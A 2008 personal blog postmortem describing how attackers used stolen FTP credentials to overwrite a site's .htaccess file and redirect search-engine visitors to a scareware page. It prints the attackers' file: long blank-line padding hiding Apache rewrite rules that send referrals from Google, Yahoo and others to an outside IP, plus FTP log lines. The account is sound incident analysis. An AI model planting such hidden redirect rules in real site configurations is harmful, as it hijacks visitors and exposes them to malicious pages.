Kimler Sidebar Menu

Kimler Adventure Pages: Journal Entries

random top 40

Hack Attack

Hack Attack

September 12th, 2008  · stk

Randsco Hacked - Hackers gained FTP access and uploaded two .htaccess files, both attempted to redirect search engine visitors to another website. One failed, the other was successful. Read the postmortem on how approximately 15,000 Randsco visitors were hijacked over 5 full days, last month.

Hackers Hijack Search Engine Visitors for Five Days

This wasn't the first time our web server has been hacked. Last year, while we were hiking the West Coast Trail, Randsco was hacked, along with everyone else on our (then) shared server.

What is it about hackers? They seem to know when you're away on vacation and nowhere near a computer! Grrr.

Fast forward a year and we're now on a VPS host. This time, (as far as I know), it was only Randsco that was hacked.

For five full days in August - and a couple of partial days - all visitors clicking through to Randsco from a search engine, weren't connected to Randsco. Instead, they were automatically redirected to a spammy website that was selling "anti-virus software". The site loaded a "virus scanner" and a JavaScript alert window, which popped up in the middle of the screen. Closing these pop-ups was also difficult, as they spawned further pop-ups.

Visitors typing in a Randsco address into their address bar, weren't affected. The hackers were targeting major search engine visitors only (Google, Yahoo, AOL, etc.)

I don't know if that website was legitimately selling marginalized software or if it was a ploy to get unwary visitors to download something malicious. One is definitely worse than the other, but for me, a moot point. The fact that hackers were successfully able to redirect search engine visitors, was an egregious violation of our privacy and goal of providing helpful, relevant content and a positive visitor experience.

To learn more about how hackers gained access and what they did (a postmortem, if you will) ... carry on.

Welcome Home from Vacation!

Of course, the first we learned that hackers had broken into our web server, was after we returned from our Bowron Lakes Canoe adventure. It took a while, actually, to discover the problem. (I'm not in the habit of using a search engine to get to Randsco, the site is generally open all the time in a web browser tab, or I paste in a URL or click on a toolbar icon). For me, the site looked fine and I was completely unaware that the web server had been hacked.

The first I learned of the break-in, was while reading an email from a website visitor:

When I Google on "randsco photo caption zoom" I get one result:
http://randsco.com/index.php/2006/04/10/photo_caption_zoom_version_3
which links me to a "reported attack site" error ... thought you'd like to know.
Sara

That sounded very "odd" to me and I performed an identical search. Randsco was indeed, the first result, of a number and so I clicked on the link. Wow! Suddenly I was looking at another website, a pop-up had come up on the screen, I had a difficult time clicking it closed (as it generated another pop-up) ... Oh my God! What is going on?!

There's nothing more discombobulating than discovering something is majorly awry with your website. Somehow, knowing that "anyone on the planet" who is heading to your site, is seeing something completely different than what you've intended, causes major panic and your brain to cease functioning.

What could be causing this? I couldn't imagine. (At first, I was thinking that something was wrong with Google's server. Somehow, they'd messed up with their spidering of our site or something.

I clung to this bit of non-deductive reasoning, right up until I realized that Yahoo Search yielded the same result. Then I finally realized - we've been hacked!

 

Hacked History

The path to discovering how the hackers had managed to break-in, began with the discovery that the .htaccess What's an .htaccess File? On a Linux web server, running Apache software, an .htaccess file (short for HyperText Access) is the name of a directory-level configuration file. The [dot] is a convention for a UNIX "hidden file". .htaccess files are placed in a particular directory and contain ascii-text directives that configure that directory (and any subdirectories). The file may contain many different configuration directives, but it's often used to specify the security restrictions for a particular directory (hence the name "access"). The .htacess file can also used for customized error responses, rewriting URLs, cache control, hotlink protection and many other things. Click the link to learn more about .htaccess files (Apache user manual on .htaccess).  file in the root web directory - public_html - had been deleted. Once I uploaded the last, locally saved version, everything returned to normal.

"That was simple," I thought.

But, it didn't explain what was happening or why.

The next day, I conducted a more thorough investigation and realized what had happened.

Somehow, the hackers gained access to our FTP username and password. The FTP log shows that the initial hacking was done on August 8th. The hackers uploaded a 471-byte .htaccess file to our home directory, unbeknown to us.

Nothing happened as a result of this particular break-in, because the file was loaded one directory level above our webroot and I already have an .htaccess file in the webroot directory.

Apparently, the hackers realized that their .htaccess file wasn't doing anything, because on August 14th, they broke in again an overwrote the .htaccess file in the public_html directory. Here is the bit from the FTP log that shows the second (successful) break-in:

Code:

Aug 14 12:44:59 vps01 pure-ftpd: (?@97.87.189.49) [INFO] New connection from 97.87.189.49  
Aug 14 12:45:01 vps01 pure-ftpd: (?@97.87.189.49) [INFO] randsco is now logged in  
Aug 14 12:45:05 vps01 pure-ftpd: (randsco@97.87.189.49) [NOTICE] /home/randsco//public_html/.htaccess uploaded  (471 bytes, 0.69KB/sec)  
Aug 14 12:45:06 vps01 pure-ftpd: (randsco@97.87.189.49) [INFO] Logout. 

 

The code they uploaded contained a bunch of blank lines (which was why, when I edited it, after I got home, I thought it was "empty"). In fact, after the blank lines, was the redirect stuff that hijacked search engine visitors. Here's a copy of the offending .htaccess code (the links have been munged - don't want to give the wankers any unnecessary publicity).

Code:

Hackers added a bunch of blank lines to make it look like the file was "empty"  
 
 
 
... scroll down for the code they used to hijack our visitors ...  
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
RewriteEngine On  
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]  
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]  
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]  
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]  
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]  
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]  
RewriteRule .* http: (munged) //87.248.180.90/in.html?s=sg [R,L]  
Errordocument 404 http: (munged) //87.248.180.90/in.html?s=sg_err  
 

 

In retrospect, the damage could have been a LOT worse than simply over-writing the .htaccess file and we're very thankful that it wasn't. Applying the "fix" was simple, but that doesn't help the 15,000 (or so) people that are estimated to have been redirected, during this 5+ day period of time. To them, all we can do is apologize.

 

To FTP or Not to FTP - This is the Question

While we changed our FTP password, this is of very little reassurance that such a break-in won't happen again. We're very strict about our web security and fairly certain that the username and password wasn't compromised at this end (we never FTP from public computers, don't write the password down and - even if we did - we live in a very rural location and it's unlikely that anyone would see it).

One of the main failings with FTP is that when you log in, the password is sent in plain text, across the Internet. For this reason, lots of people recommend not using FTP. "Someone using a packet sniffer would be able to glean your password!" they say.

While this is true, I think it's highly unlikely that we were targeted in such a manner. Someone would - literally - have to collect and sift through a vast amount of data, in order to harvest FTP passwords and the likelihood that Randsco was targeted in this manner, is extremely remote.

The only other thing I can think of, is that hackers are exploiting some "security hole" in our administration software (cPanel, which is a publicly-available, open-source software package). There are scads of reported cPanel security bugs, so this seems like a likely source.

In an effort to determine if Randsco was alone, I've emailed our host, to see if there were any other reports of hacked websites, using these .htaccess methods, during the same period of time.

I have looked into non-FTP methods of transferring files to our web server, so that I could turn off FTP and sidestep those security issues, but so far, I haven't found a work-flow that I like. It's not so much that shell transfers are onerous, as it is that I've come to rely on software that allows me to connect (via FTP) and work on server files directly.

I'm all for security, but when it becomes inconvenient or increases the number of hoops one has for a particular workflow, I tend to shun it. If I end up losing convenience or increase workload, because of hackers and/or spammers ... then (as far as I'm concerned) "they win". And I'm not ready to concede that battle just yet.

We'll be using FTP, but we'll also be changing passwords more often, taking lots of backups and keeping tabs on our web space.

(Permalink)
Views: 18109 views
Leave a Comment · GuestBook
default pin-it button
Updated: 13-Sep-2008
Web View Count: 18109 viewsLast Web Update: 13-Sep-2008

Your Two Sense:

XHTML tags allowed. URLs & such will be converted to links.


Subscribe to Comments

Auto convert line breaks to <br />

No Comments or trackbacks for this post yet ...